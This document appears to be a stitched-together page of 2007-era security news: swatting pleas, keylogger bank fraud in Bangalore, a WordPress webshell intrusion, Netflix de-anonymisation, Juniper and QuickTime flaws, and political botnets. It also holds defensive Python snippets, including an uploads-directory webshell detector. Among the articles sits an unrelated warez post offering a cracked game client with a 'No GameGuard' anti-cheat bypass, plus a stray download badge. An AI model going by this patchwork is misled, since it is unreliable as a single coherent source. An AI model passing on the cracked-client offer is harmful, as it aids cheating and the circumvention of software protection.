In the past several weeks, four individuals have pleaded guilty to participating in a series of swatting hoaxes that over a course of five years snared as many as 100 victims and losses of more than $250,000. They face maximum penalties of five years each in prison and fines of $250,000.

A suspect in a separate swatting incident in Orange County, California, faces charges including computer access and fraud, false imprisonment by violence, falsely reporting a crime and assault with an assault weapon by proxy. ®


T-BOT NoDC Client Version 1.139 CRACKED

1- NoDC Only Client For Version 1.139
Click Here

2- NoDC + CursingFilter
Click Here

3- NoDC + CursingFilter + ZoomHack & It's Reverse
Click Here

4- NODC + Cursing Filter + Zoomhack and it's reverse + No GameGuard
Click Here

GreYFoX_Client_Pack.rar - GreY FoX Client Pack (8MB), contains all the clients
Click Here

GreYFoX advises you to use NoDC only (number 1 or 2); the rest are still a bit unstable.

Note:
Download this to view the file GFXGTi.nfo for instructions; it's a program called DAMN NFO Viewer.
Click Here


1- Prevents the DC Box after the message "Cannot connect Due to server traffic"
2- Same as 1 + You can say anything in chat
3- Same as 2 + you can ZOOM out and in indefinitely (infinitely)
4- Same as 3 + Game Guard Doesn't Protect the Game anymore

Remember to check the GFXGTi.nfo with the viewer I linked above.

credits to GreYFoX


Cyber crime wing arrests 12-member hacker gang in Bangalore

BANGALORE: Karnataka police's Cyber Crime wing has arrested a 12-member gang involved in various cases of hacking on-line bank accounts and transferring funds amounting to several lakhs of rupees.

The police succeeded in unearthing the fraud when they arrested the mastermind, Joseph, from a city cyber cafe which he had been frequenting, on the basis of a complaint from Carl Braganza, HR Manager of Analog Infotech India Ltd.

He had stated that he had been defrauded to the tune of Rs 1.27 lakh by some unidentified hackers, according to a release from CoD (Corps of Detectives), Economic Offences.

Joseph, a diploma holder in computer science, hailing from Virudanagar district in Tamil Nadu used to hack into accounts of persons using "key logger" software.

From the available e-mail accounts of Joseph, more than 100 bank account numbers, passwords and other details of individuals have been obtained.

HDFC Bank, Citi Bank, Axis Bank and ICICI Bank have confirmed the authenticity of about 70 existing accounts and passwords gathered by CoD officers from Joseph's e-mail accounts.

Investigation revealed that out of the 70 accounts, 17 have already been successfully hacked by Joseph with the help of his associates. Police have succeeded in solving seven cases out of the 17, involving illegal transfer of funds to the tune of Rs seven lakh; further investigation is ongoing.

Joseph's 11 associates also have been arrested.


The day my web site was hacked

An intrusion involving a stolen cookie and an unpatched PHP application has lessons for all site operators

A recent Monday morning brought a nasty surprise. A hacker had gained access to a web site I run, and planted a script engagingly entitled “Magic Include Shell WordPress Edition”, buried under an innocent-looking directory called images in the uploads section of the WordPress blog installation.

The hacker chose a Friday evening to start spitting out trackback spam, where ad-laden comments are automatically posted to other blogs, hoping that the activity would attract little attention over the weekend.

Shutting down the script was easy; but how did the intruder gain access? Could there be other sinister scripts or executables lurking on the server? How could the server now be secured?

It was the cue for hours spent trawling through Apache logs, consulting with users and developers of open-source software used on the site, and inspecting server backups to check the state of files. We think that the problem began with a stolen cookie, was escalated by a security issue in a PHP application that was not patched with the latest update, and resulted in the hacker being free to upload files and scripts to the web site wherever the web server had permission to write.

This last point is interesting. It used to be considered obvious that web servers should not have permission to write files in places where they can also be served or executed by the web server. The problem is that the surge in user-generated content means there is pressure for easy authoring and customisation of web content. WordPress is an example, and some convenient though non-essential features depend on certain folders being writeable by the web server. That proved a fatal weakness, when combined with other vulnerabilities.

It is tempting to keep quiet about an embarrassing incident. However, I am convinced that it is better to discuss and learn from events like this. Further, I have never been under the illusion that web servers like mine are secure. They are not places for critical data. Flaws in popular applications are widely and frequently exploited, so my experience is not unusual. At the same time, just because something is commonplace does not make it unimportant. Hacked sites are the source of many perils, such as virus-infected spam messages, phishing sites, or any amount of illegal content.

Lessons learned? First, anyone managing their own web site, even on a shared host, needs to come to terms with the administrative responsibilities. Unfortunately, leaving well alone is a recipe for disaster. Fully managed solutions are increasingly attractive for non-specialists. Second, it is a reminder that insecure Windows boxes are by no means the main problem for Web security; Linux and PHP can be just as bad. It all depends on configuration, management, and applications. Third, the open-source community can be wonderfully responsive when people have problems.

Fourth, if you manage a web site, don’t forget to check the logs. If your site is hacked, at least you will be likely to discover it quickly.
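As an added example rather than anything the author ran, the Python below does the log check the last lesson calls for: it flags requests that execute a PHP file from the WordPress uploads directory, which should only ever serve static files. The log lines, file names and addresses are constructed; the Apache snippet in the closing comment is one way to refuse such execution.

```python
"""Scan Apache access logs for script execution under wp-content/uploads.
Added example with constructed log lines (documentation IP ranges, made-up paths)."""
import re
from collections import Counter
from typing import Dict, List

# Constructed sample in Apache combined log format.
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [07/Dec/2007:19:02:11 +0000] "POST /wp-content/uploads/images/include.php HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.2 - - [07/Dec/2007:19:02:40 +0000] "GET /wp-content/uploads/2007/12/photo.jpg HTTP/1.1" 200 34567 "http://blog.example/" "Mozilla/5.0"
203.0.113.7 - - [07/Dec/2007:19:03:05 +0000] "GET /wp-content/uploads/images/include.php?p=1 HTTP/1.1" 200 2048 "-" "Mozilla/4.0"
198.51.100.9 - - [07/Dec/2007:19:04:17 +0000] "GET /index.php HTTP/1.1" 200 8901 "-" "Mozilla/5.0"
203.0.113.7 - - [07/Dec/2007:21:45:59 +0000] "POST /wp-content/uploads/images/include.php HTTP/1.1" 200 600 "-" "Mozilla/4.0"
"""

# ip, identd, user, [time], "METHOD path protocol", status, size (rest ignored)
LOG_LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Anything under uploads ending in a PHP-family extension; a query string may follow.
UPLOAD_SCRIPT_RE = re.compile(
    r'^/wp-content/uploads/.*\.(?:php\d?|phtml)(?:\?.*)?$', re.IGNORECASE
)


def parse_line(line: str) -> Dict[str, str]:
    """Return the named fields of one log line, or {} if it does not parse."""
    m = LOG_LINE_RE.match(line)
    return m.groupdict() if m else {}


def is_script_under_uploads(path: str) -> bool:
    """True when the request path would execute a script from the uploads tree."""
    return UPLOAD_SCRIPT_RE.match(path) is not None


def find_upload_script_hits(log_text: str) -> List[Dict[str, str]]:
    """All parsed entries whose path is a script under uploads, in log order."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and is_script_under_uploads(entry["path"]):
            hits.append(entry)
    return hits


def summarize_by_client(hits: List[Dict[str, str]]) -> Counter:
    """Count hits per client address: a single address hammering one uploaded
    script is the pattern to look for after a compromise like the one described."""
    return Counter(h["ip"] for h in hits)


if __name__ == "__main__":
    found = find_upload_script_hits(SAMPLE_ACCESS_LOG)
    for h in found:
        print(h["time"], h["ip"], h["method"], h["path"], h["status"])
    print(summarize_by_client(found))

# Matching hardening, as an assumption about a typical Apache 2.2 + mod_php host:
# stop the web server executing anything it was allowed to write into uploads.
#   <Directory "/var/www/blog/wp-content/uploads">
#       php_flag engine off
#       <FilesMatch "\.ph(p[0-9]?|tml)$">
#           Order allow,deny
#           Deny from all
#       </FilesMatch>
#   </Directory>
```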


Cyber-crooks gear up for ID bonanza

Security experts have warned consumers to be aware of the growing threat of ID theft as the online holiday shopping season reaches full swing.

ID Secure, which uses public records, Social Security numbers and credit card monitoring technology to fight ID theft, said that personal identities could also be for sale to Christmas shoppers in the criminal world.

"Wherever there is information about a person, whether retained by a retailer, bank, credit bureau or database, there is someone out there who has the ability to steal it," said Dan Clements, a spokesman for ID Secure.

"The more difficult you make it for someone to rip you off, the less chance you have of becoming a victim of identity theft. These criminals are not looking for a challenge; they are looking for an opportunity."

Retail sales are expected to hit $474bn this year, according to the National Retail Federation, and online shopping soared 37 per cent on Cyber-Monday this year.

ID Secure has issued the following tips to help consumers shop safely this year:

* Limit the credit cards you carry, and leave other ID such as Social Security cards at home
* Keep all receipts and examine every charge on your statement before paying
* Make sure your security and antivirus software is updated regularly
* Give cash or gift cards as presents rather than writing cheques
* Use a cross-cut shredder
* Use passwords that are not easily cracked by hackers

Identity theft is the fastest growing crime in America, according to a study from Javelin Strategy & Research. The company recorded 27.3 million victims in the past five years, and nearly 20 million in the past two years.

"New technologies can keep consumers one step ahead of would be ID thieves. They are perhaps the best chance of avoiding identity-related criminal abuse," said Clements.

"Punishment for fraud and recovery of stolen funds is so rare that prevention is the only viable course of action."


Sys admin admits trying to axe California power grid

A sys admin last week pleaded guilty to attempting to disrupt the power grid in California by shutting down a data centre that managed the state's electrical supply.

Lonnie Charles Denison, 33, of South Natomas in California confessed to breaking a glass cover and pushing an emergency power off button at the Independent System Operator's (ISO) data centre near Folsom on 15 April. The contract Unix sys admin was upset with his employer and co-workers at the time. Denison reportedly snapped shortly after discovering his computer privileges had been revoked.

Denison's actions prevented the ISO from communicating with the electricity market for about two hours, leaving California vulnerable to blackout conditions. In the event no blackout occurred because the incident happened late on a Sunday night, when demand was low, so California had no need to buy in excess generating capacity from other states.

Nonetheless, the incident cost the centre $14,000, UPI reports. It took 20 computer specialists about seven hours to restore the system.

Folsom data centre blues

Prosecutors allege Denison compounded his offences by sending a threatening email to an unnamed California ISO employee the next day implying he had planted a bomb at the facility. The email said: "Hey, at one point I respected you... you have a new kid. So this is only because of him. Get out before the timer expires. Not long now. Take care."

ISO responded by evacuating 500 workers from the facility and transferred control of the grid to a second control centre.

Denison pleaded guilty to attempted damage of an energy facility, a felony offence punishable with up to five years' imprisonment and a $250,000 fine, at a hearing in Sacramento on Friday. He faces a sentencing hearing scheduled for 29 February. ®


Facebook Sues Porn Company Over Hacking

The social network claims a bot from the Canadian porn site tried to gather its members' data.

Facebook is suing seventeen people and a Canadian Internet porn company for allegedly trying to mine the popular social networking site for its users' personal details.

Facebook alleges that in June servers controlled by the defendants used automated scripts to make more than 200,000 requests for personal information stored on Facebook's site. The allegations are contained in an amended lawsuit filed earlier this month in U.S. District Court in San Jose, California.

The company first filed suit back in June, but amended the complaint this month after obtaining court orders to identify who controlled the servers trying to access its site.

Experts have warned people against publishing too much personal information on social networking sites for fear it could be collected and then abused by fraudsters.

Facebook, one of the most-used social networking sites after MySpace, said the automated scripts caused error messages to be generated, but the company did not say if user information was successfully collected.

Named in the suit is Istra Holdings, which controls SlickCash.com, an affiliate advertising business that offers commissions to Web publishers for referring Internet surfers to its portfolio of adult sites.

It also names Brian Fabian and Josh Raskin, both of whom the suit says work at Istra in Toronto, and Ming Wu of Markham, Ontario, as well as 14 other unidentified people.

Facebook said the hacking attempts cost it at least US$5,000 to investigate. The company has requested a jury trial and is seeking to bar the defendants from accessing its computer systems in the future, in addition to damages.


Download Silkroad Online Fortress War - Legend II

Just click This Download Badge

SilkroadOnline_GlobalOfficial




Why 'Anonymous' Data Sometimes Isn't

Last year, Netflix published 10 million movie rankings by 500,000 customers, as part of a challenge for people to come up with better recommendation systems than the one the company was using. The data was anonymized by removing personal details and replacing names with random numbers, to protect the privacy of the recommenders.

Arvind Narayanan and Vitaly Shmatikov, researchers at the University of Texas at Austin, de-anonymized some of the Netflix data by comparing rankings and timestamps with public information in the Internet Movie Database, or IMDb.

Their research (.pdf) illustrates some inherent security problems with anonymous data, but first it's important to explain what they did and did not do.

They did not reverse the anonymity of the entire Netflix dataset. What they did was reverse the anonymity of the Netflix dataset for those sampled users who also entered some movie rankings, under their own names, in the IMDb. (While IMDb's records are public, crawling the site to get them is against the IMDb's terms of service, so the researchers used a representative few to prove their algorithm.)

The point of the research was to demonstrate how little information is required to de-anonymize information in the Netflix dataset.

On one hand, isn't that sort of obvious? The risks of anonymous databases have been written about before, such as in this 2001 paper published in an IEEE journal (.pdf). The researchers working with the anonymous Netflix data didn't painstakingly figure out people's identities -- as others did with the AOL search database last year -- they just compared it with an already identified subset of similar data: a standard data-mining technique.

But as opportunities for this kind of analysis pop up more frequently, lots of anonymous data could end up at risk.

Someone with access to an anonymous dataset of telephone records, for example, might partially de-anonymize it by correlating it with a catalog merchants' telephone order database. Or Amazon's online book reviews could be the key to partially de-anonymizing a public database of credit card purchases, or a larger database of anonymous book reviews.

Google, with its database of users' internet searches, could easily de-anonymize a public database of internet purchases, or zero in on searches of medical terms to de-anonymize a public health database. Merchants who maintain detailed customer and purchase information could use their data to partially de-anonymize any large search engine's data, if it were released in an anonymized form. A data broker holding databases of several companies might be able to de-anonymize most of the records in those databases.

What the University of Texas researchers demonstrate is that this process isn't hard, and doesn't require a lot of data. It turns out that if you eliminate the top 100 movies everyone watches, our movie-watching habits are all pretty individual. This would certainly hold true for our book reading habits, our internet shopping habits, our telephone habits and our web searching habits.

The obvious countermeasures for this are, sadly, inadequate. Netflix could have randomized its dataset by removing a subset of the data, changing the timestamps or adding deliberate errors into the unique ID numbers it used to replace the names. It turns out, though, that this only makes the problem slightly harder. Narayanan's and Shmatikov's de-anonymization algorithm is surprisingly robust, and works with partial data, data that has been perturbed, even data with errors in it.

With only eight movie ratings (of which two may be completely wrong), and dates that may be up to two weeks in error, they can uniquely identify 99 percent of the records in the dataset. After that, all they need is a little bit of identifiable data: from the IMDb, from your blog, from anywhere. The moral is that it takes only a small named database for someone to pry the anonymity off a much larger anonymous database.

Other research reaches the same conclusion. Using public anonymous data from the 1990 census, Latanya Sweeney found that 87 percent of the population in the United States, 216 million of 248 million, could likely be uniquely identified by their five-digit ZIP code, combined with their gender and date of birth. About half of the U.S. population is likely identifiable by gender, date of birth and the city, town or municipality in which the person resides. Expanding the geographic scope to an entire county reduces that to a still-significant 18 percent. "In general," the researchers wrote, "few characteristics are needed to uniquely identify a person."

Stanford University researchers reported similar results using 2000 census data. It turns out that date of birth, which (unlike birthday month and day alone) sorts people into thousands of different buckets, is incredibly valuable in disambiguating people.
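A release reviewer can measure exactly this on a candidate dataset before publishing it. The following is an added example (not Sweeney's or the Stanford team's code) that computes, for a constructed table of six invented rows, how many rows are unique under each choice of quasi-identifier and what k-anonymity level the table actually achieves; the column names and rows are assumptions made for the illustration:

```python
from collections import Counter

# Constructed "census" rows: (ZIP, gender, date of birth, city). The values are
# invented purely to show how identifying power changes as attributes are coarsened.
PEOPLE = [
    ("02139", "F", "1970-05-01", "Cambridge"),
    ("02140", "F", "1970-05-01", "Cambridge"),
    ("02139", "M", "1970-05-01", "Cambridge"),
    ("02140", "M", "1970-05-01", "Cambridge"),
    ("02139", "F", "1970-09-15", "Cambridge"),
    ("02141", "M", "1965-01-30", "Cambridge"),
]


# Quasi-identifier choices, from finest (ZIP + gender + full date of birth)
# to coarsest (city + gender + birth year).
def zip_gender_dob(r):
    return (r[0], r[1], r[2])


def city_gender_dob(r):
    return (r[3], r[1], r[2])


def city_gender_year(r):
    return (r[3], r[1], r[2][:4])


def uniqueness(rows, key):
    """Fraction of rows whose quasi-identifier combination occurs exactly once:
    the figure Sweeney reports as 87 percent for ZIP + gender + date of birth."""
    counts = Counter(key(r) for r in rows)
    return sum(1 for r in rows if counts[key(r)] == 1) / len(rows)


def min_k(rows, key):
    """Smallest group size under the key: the k in k-anonymity the table achieves."""
    return min(Counter(key(r) for r in rows).values())


def unique_rows(rows, key):
    """Indices of the rows a reviewer would have to generalize or suppress
    before release, because nobody else in the table shares their key."""
    counts = Counter(key(r) for r in rows)
    return [i for i, r in enumerate(rows) if counts[key(r)] == 1]


if __name__ == "__main__":
    for name, key in (("zip+gender+dob", zip_gender_dob),
                      ("city+gender+dob", city_gender_dob),
                      ("city+gender+year", city_gender_year)):
        print(f"{name:18s} unique={uniqueness(PEOPLE, key):.2f} k={min_k(PEOPLE, key)}")
```

On the constructed rows every person is unique under ZIP + gender + date of birth, a third remain unique when ZIP is widened to the city, and only one does when the date is reduced to a birth year; yet even then k is still 1, so the table would need that last row suppressed or further generalized before it could be called anonymous.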

This has profound implications for releasing anonymous data. On one hand, anonymous data is an enormous boon for researchers -- AOL did a good thing when it released its anonymous dataset for research purposes, and it's sad that the CTO resigned and an entire research team was fired after the public outcry. Large anonymous databases of medical data are enormously valuable to society: for large-scale pharmacology studies, long-term follow-up studies and so on. Even anonymous telephone data makes for fascinating research.

On the other hand, in the age of wholesale surveillance, where everyone collects data on us all the time, anonymization is very fragile and riskier than it initially seems.

Like everything else in security, anonymity systems shouldn't be fielded before being subjected to adversarial attacks. We all know that it's folly to implement a cryptographic system before it's rigorously attacked; why should we expect anonymity systems to be any different? And, like everything else in security, anonymity is a trade-off. There are benefits, and there are corresponding risks.

Narayanan and Shmatikov are currently working on developing algorithms and techniques that enable the secure release of anonymous datasets like Netflix's. That's a research result we can all benefit from.


Traffic snags on Juniper router glitch

Juniper has published a security update designed to fix a bug involving its router software.

The glitch in JUNOS creates problems for networking kit from Juniper in processing Border Gateway Protocol (BGP) traffic. BGP is a core routing protocol of the internet that's widely used by ISPs and others to (put simply) map the best available routes for traffic to flow across the internet.

Left unfixed the flaw means that malformed BGP packets may induce "interface flapping".

Interface flapping means the interface of a network device is left going up and down repeatedly - like a tart's knickers, though on a much accelerated scale. The behaviour, on a large computer network, might be used to exhaust the memory buffers on devices targeted with malformed IPv6 messages. This, in turn, might lead to lost datagrams and general network chaos.
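Flapping of the kind described here is visible in a router's syslog as a burst of link-down/link-up traps on the same interface, and an operator can alert on it well before buffers are exhausted. The following is an added example (not Juniper's code or any product's); the log lines are constructed, loosely modelled on JUNOS link-state traps, and the window and threshold are assumptions to tune per network:

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed syslog excerpt. ge-0/0/0 flaps six times in fifteen seconds;
# ge-0/0/1 goes down once for fifteen minutes, which is not flapping.
LOG = """\
Dec 11 10:00:01 rtr1 mib2d[1234]: SNMP_TRAP_LINK_DOWN: ifIndex 512, ifAdminStatus up(1), ifOperStatus down(2), ifName ge-0/0/0
Dec 11 10:00:04 rtr1 mib2d[1234]: SNMP_TRAP_LINK_UP: ifIndex 512, ifAdminStatus up(1), ifOperStatus up(1), ifName ge-0/0/0
Dec 11 10:00:07 rtr1 mib2d[1234]: SNMP_TRAP_LINK_DOWN: ifIndex 512, ifAdminStatus up(1), ifOperStatus down(2), ifName ge-0/0/0
Dec 11 10:00:09 rtr1 sshd[2200]: Accepted publickey for admin from 192.0.2.10
Dec 11 10:00:10 rtr1 mib2d[1234]: SNMP_TRAP_LINK_UP: ifIndex 512, ifAdminStatus up(1), ifOperStatus up(1), ifName ge-0/0/0
Dec 11 10:00:13 rtr1 mib2d[1234]: SNMP_TRAP_LINK_DOWN: ifIndex 512, ifAdminStatus up(1), ifOperStatus down(2), ifName ge-0/0/0
Dec 11 10:00:16 rtr1 mib2d[1234]: SNMP_TRAP_LINK_UP: ifIndex 512, ifAdminStatus up(1), ifOperStatus up(1), ifName ge-0/0/0
Dec 11 10:05:00 rtr1 mib2d[1234]: SNMP_TRAP_LINK_DOWN: ifIndex 513, ifAdminStatus up(1), ifOperStatus down(2), ifName ge-0/0/1
Dec 11 10:20:00 rtr1 mib2d[1234]: SNMP_TRAP_LINK_UP: ifIndex 513, ifAdminStatus up(1), ifOperStatus up(1), ifName ge-0/0/1
""".splitlines()

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} \d{1,2} \d\d:\d\d:\d\d) \S+ mib2d\[\d+\]: "
    r"SNMP_TRAP_LINK_(?P<state>UP|DOWN): .*\bifName (?P<ifname>\S+)$"
)


def parse(line, year=2007):
    """Return (timestamp, interface, state) for a link trap, None for any other line.
    Classic syslog timestamps carry no year, so the caller supplies one."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["ifname"], m["state"]


def find_flapping(lines, window=timedelta(seconds=60), max_transitions=4, year=2007):
    """Flag an interface the first time it records max_transitions link-state
    changes inside one sliding window. Returns {ifname: time first flagged}."""
    recent = defaultdict(deque)   # per-interface timestamps inside the window
    flagged = {}
    for line in lines:
        parsed = parse(line, year)
        if parsed is None:
            continue
        ts, ifname, _state = parsed
        q = recent[ifname]
        q.append(ts)
        while ts - q[0] > window:   # drop transitions that fell out of the window
            q.popleft()
        if len(q) >= max_transitions and ifname not in flagged:
            flagged[ifname] = ts
    return flagged


if __name__ == "__main__":
    for ifname, when in find_flapping(LOG).items():
        print(f"{ifname} flapping since {when:%H:%M:%S}")
```

Counting transitions rather than down events alone matters: a single long outage produces one down and one up, while flapping produces a dense alternation, and the sliding window keeps the alert from firing on transitions hours apart.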

JUNOS releases from 7.3 to 8.4 are potentially vulnerable. Users are urged to upgrade their software to 8.5R1. The bug lends itself to remote exploitation, making it possible that it might form the basis of a denial of service attack by hackers against service providers running Juniper kit.

Juniper is a strong number two behind Cisco in the supply of routing kit to large ISPs and telcos. One or two telco techies are already reporting minor glitches that they blame on the problem. A discussion on the issue can be found here. ®


Digital wanted posters help find fugitives

MOBILE, Alabama (AP) -- Between ads for hamburgers and liposuction, the giant digital billboards flashed an image of Oscar Finch's face taken by a surveillance camera. The young man wasn't selling anything. He was running from police.


A billboard on Airport Blvd just west of Interstate 65 shows a wanted poster of Oscar Finch.

Finch was a suspect in a bank robbery last month. More than a week after the crime, authorities obtained the photo and immediately posted it on 12 digital billboards in Mobile, using the eye-catching electronic signs as digital wanted posters.

The billboard showed a grainy mugshot of Finch taken during the November 20 heist. The image, which was mixed in with commercial ads, included his name, his alleged offense and a phone number to contact police.

The 21-year-old Finch, who was the first suspect featured on an electronic billboard in Mobile, surrendered on December 1 -- just a day after his picture appeared. Police spokeswoman Nancy Johnson said he apparently turned himself in after seeing news coverage of the billboards.

"We had been looking for this individual for 10 days and turned it around in 24 hours," Johnson said. "So we're thinking it's going to be highly effective. I think it's a great asset for us."


Wanted posters have been used to find suspects for generations. Sketches of criminals in the Wild West were tacked onto trees and buildings. In more recent years, photos of the FBI's most wanted fugitives have been displayed in post offices.

With digital billboards, police can now display a suspect's face to thousands of people, sometimes almost immediately after a crime is reported.

"We can be up in 15 minutes" of getting a suspect's photo, said Troy Tatum, general manager of Lamar Advertising, the Baton Rouge, Louisiana-based company that provided free use of the billboards in Mobile as a public service.

When the electronic boards aren't showing suspects, they display regular advertising in moving, full-color images that stand 14 feet tall and 48 feet wide. They can also be used for AMBER Alerts for missing children and to deliver weather bulletins.

"We have a special slot set up for local emergencies," Tatum said.

Mobile Police Chief Phillip M. Garrett doesn't want to give such prominent display to "every lawnmower thief" wanted by police. He said the billboards will be used only in high-profile cases or in searches for missing people.

Only a fraction of U.S. billboards are digital -- 500-plus out of an estimated 450,000 total signs, according to the industry. But production of electronic boards is expected to grow.

Police in other parts of the country are also beginning to use the billboards.

In September, Florida authorities arrested a drug suspect two weeks after his photo was displayed on a billboard in Daytona Beach. A tipster who saw the suspect's picture found him sitting in a McDonald's.

The billboards have also been useful in disasters. When an interstate bridge collapsed in August in Minneapolis, billboards displayed an emergency message within 15 minutes.

The signs also have critics. Mobile City Council member Connie Hudson has proposed a temporary moratorium on any new billboards, saying the city needs safety regulations to control the number and spacing of the signs because they may distract drivers.

The full council has not acted on Hudson's concerns.

Ken Klein, vice president of the Outdoor Advertising Association of America Inc., in Washington, D.C., said billboard wanted posters became more common after a young woman was slain in 2002 in Leawood, Kansas.

The victim's father, Roger Kemp, approached Lamar Advertising for help, and the company posted a composite sketch of the suspect on a conventional billboard. A tipster who saw the sketch led authorities to Benjamin Appleby, 31.

Appleby was convicted in 2006 and sentenced to life in prison for killing 19-year-old Ali Kemp.


Apple patches streaming media flaw

Apple has patched a flaw in its Quicktime multimedia player which is currently being exploited by attackers.

The vulnerability exists in the way Quicktime handles RTSP streaming media files. When a specially crafted file is launched, a buffer overflow error occurs. This error allows an attacker to remotely execute code on the targeted user's machine.

The vulnerability was discovered by Polish security researcher Krystian Kloskowski in late November. Less than two weeks later, reports surfaced that attackers were actively targeting the vulnerability via adult websites.

The flaw was considered a greater risk for Firefox users because of the way the browser interacted with the Quicktime player. Researchers found that both Internet Explorer and Safari were able to prevent the attack from successfully executing.

The update addresses the issue in the Quicktime player software for both Windows and MacOS systems. Users can download the update from Apple's website or via the company's Software Update utility.


Botnets linked to political hacking in Russia

Security researcher Jose Nazario has uncovered circumstantial evidence of the use of botnets in politically-motivated denial of service attacks.

Political events in the wider world are sometimes accompanied by hacking incidents in cyberspace, such as defacements and the like. Nobody paid much attention to the issue until the Estonian DDoS events of earlier this year when government and commercial sites in the small Baltic country were taken offline for days in April amid a row with Russia about relocation of a Soviet-era memorial to fallen soldiers and war graves.

Botnets orchestrated by Russian hackers are reckoned to have been used to fire up the Estonian attacks. Involvement of elements from the Russian government is suspected by some, though there's nothing by way of evidence that the Kremlin had a hand in the assaults.

Nazario, a senior security researcher at Arbor Networks, has documented how botnets have featured in more recent politically motivated DDoS events. Attacks on the Ukrainian pro-Russian site of the Party of Regions, a party led by the Ukrainian Prime Minister Viktor Yanukovych, over the last three months were traced by Nazario back to networks of compromised machines.

Earlier DDoS attacks against the site of Ukraine President Viktor Yushchenko, a moderate Ukrainian nationalist, were not traced back to botnet activity.

Last week, Nazario traced attacks on the site of Gary Kasparov, famed Russian chess grand master turned anti-establishment politician, and namarsh.ru, another dissident site, back to a botnet. Both targeted sites seem to have weathered the assault largely unscathed (though the graphics on Kasparov's site failed to load properly).

The motives, much less the perpetrators, of the attacks remain unclear. "I can dream up scenarios where Russian hackers attack Russian dissident websites and politicians’ websites (and why, for example, a Ukrainian site that is pro-Russian is attacked), but I don’t know who is at the keyboard," Nazario writes. "I’ll keep watching these attacks and seeing what I can figure out, but so far it’s just a matter of guessing at motivations." ®


Survey: Privacy breaches rampant in corporations

Nearly 85 percent of privacy and security professionals believe a reportable breach of personally identifiable information (PII) occurred within their organization in the last year, according to an online survey of 800 such professionals published on Tuesday by accounting firm Deloitte & Touche and the Ponemon Institute.

Almost two-thirds of the professionals polled stated that their organizations had experienced multiple reportable breaches in the past year. The security and privacy managers only dedicated approximately 7 percent of their time to training employees and, at most, 10 percent of their time to establishing an incident response team, the survey found.

“Frankly, I’m shocked by the high percentage of PII data breaches we’re seeing occur within organizations," Rena Mears, Deloitte global and U.S. privacy and data protection leader, stated in the release announcing the study. "This survey provides insight into the scale of the problem and how enterprises are struggling to respond. It’s clear that both privacy and security professionals are caught in a reactive cycle, and they agree on the need to move to a more proactive stance.”

A number of events in 2007 have raised corporate awareness of privacy issues. In January, retail giant TJX Companies announced that successive online attacks during 2005 and 2006 had resulted in the loss of, at last count, more than 94 million credit- and debit-card accounts. Last month, the head of HM Revenue & Customs, the United Kingdom's tax agency, resigned following a massive data leak that potentially put the sensitive personal details of 25 million people at risk.

The attention has caused many companies to move toward encrypting their data. The survey found that 55 percent of companies are implementing "some type of encryption" and 37 percent are currently encrypting data in transit and information stored on servers.


Privacy storm descends on Dutch health care database

The Dutch Data Protection Authority is investigating claims that a medical database set up by health insurance companies reveals details about nearly every Dutch citizen.

Birth dates, social security numbers, health insurance information, and addresses of Dutch celebrities, MPs, and even well-known criminals can be easily traced by doctors, dentists, or suppliers of health care aids who use the database, Dutch newspaper Trouw revealed this week.

The Vecozo medical database is used by health care workers to make payments easier and to check Dutch medical insurance data. At least 80,000 people are able to search the database.

Vecozo, which is secured with a password and a certificate, stresses that no phone numbers can be found in the database. Celebs are able to change their personal information, so they cannot be traced under their own name.

Anyone that abuses the database will be punished, Vecozo warned yesterday, but computer security expert Bart Jacobs of Radboud University Nijmegen and TU Eindhoven told Trouw there is simply too much information in the database. "You don't need all that data in order to verify certain procedures," he said. ®


Spam accounts for nearly 95 per cent of email

Spam email accounted for between 90 and 95 per cent of all email in 2007, up from an estimated five per cent of email in 2001, according to a report from web security company Barracuda Networks.

The report, which analysed more than one billion daily email messages sent to more than 50,000 users worldwide, also tracked the increasing complexity of spam techniques over the past several years. 2007 witnessed the majority of spammers using identity obfuscation techniques, in which spammers send email from diverse sources throughout the internet.

Other spamming trends include the increased use of attachments, such as PDF files and other file formats.

Prominent spam techniques from previous years include:

2006 - Image spam and botnets
2005 - Rotating URL spam
2004 - Automated generation of spam variants
2003 - Open relays, blast emails, spoofing

“The spam war is a continuous battle between spammers and security vendors,” said Dean Drako, president and CEO of Barracuda Networks. “Security vendors now require 24-by-7 defence operations to continuously monitor the internet for new spam trends and distribute new defensive solutions immediately.”

A separate poll of business professionals by the same company found that more than half (57 per cent) of the 261 respondents now consider spam to be the worst form of junk advertising, nearly double the 31 per cent that cited postal junk mail and well ahead of the 12 per cent who chose telemarketing as their chief bugbear.


Hackers Likely to Target Chinese Users in 2008

Security company Arbor Networks declared the iPhone to be a big target of mainland cybercriminals next year

IT security company Arbor Networks released a statement Tuesday declaring the iPhone to be a big target amongst cybercriminals next year.

Its Security and Engineering Response Team (ASERT) said the iPhone will fall "victim of a serious attack" in 2008, noting that the mobile device will likely be hit by "drive-by attacks". Arbor described these attacks as malware embedded in commonly used information such as images, which are capable of conducting "dangerous actions" when rendered in the iPhone's Web browser.

Because of the attention the iPhone generated over the past year, ASERT said hackers will be lured by the idea of being the first to penetrate the new platform and attack Apple users.

Arbor is not the first to issue security warnings about the iPhone. A team of U.S. security researchers in July said they had written two exploits capable of causing "serious problems" with the design and security implementation on the phone.

Research house Gartner also issued a cautionary note in June calling for enterprises to outlaw the Apple device from their office environment, due to lacking support from major mobile security tools and mobile e-mail vendors, among other issues.

A Gartner analyst, however, later predicted Apple may introduce an enterprise-class version of the iPhone that will better meet the requirements of a corporate environment.

Officially launched in the United States and Europe earlier this year, the iPhone is expected to make its debut in Asia next year, though Apple has yet to firm up an official launch date. The U.S. company is reportedly in talks with various operators across the Asian region.

Chinese spells trouble, too

According to ASERT, 2008 will also see an increase in "Chinese on Chinese" online attacks, involving specifically Chinese-language software such as QQ Messenger. Arbor noted that such attacks are expected to grow next year as new Chinese users join the online community, more software is written for the Chinese market, and Chinese cybercriminals become increasingly sophisticated and organized.

The IT security vendor also expects much larger Storm botnets and peer-to-peer attacks to be prevalent next year.

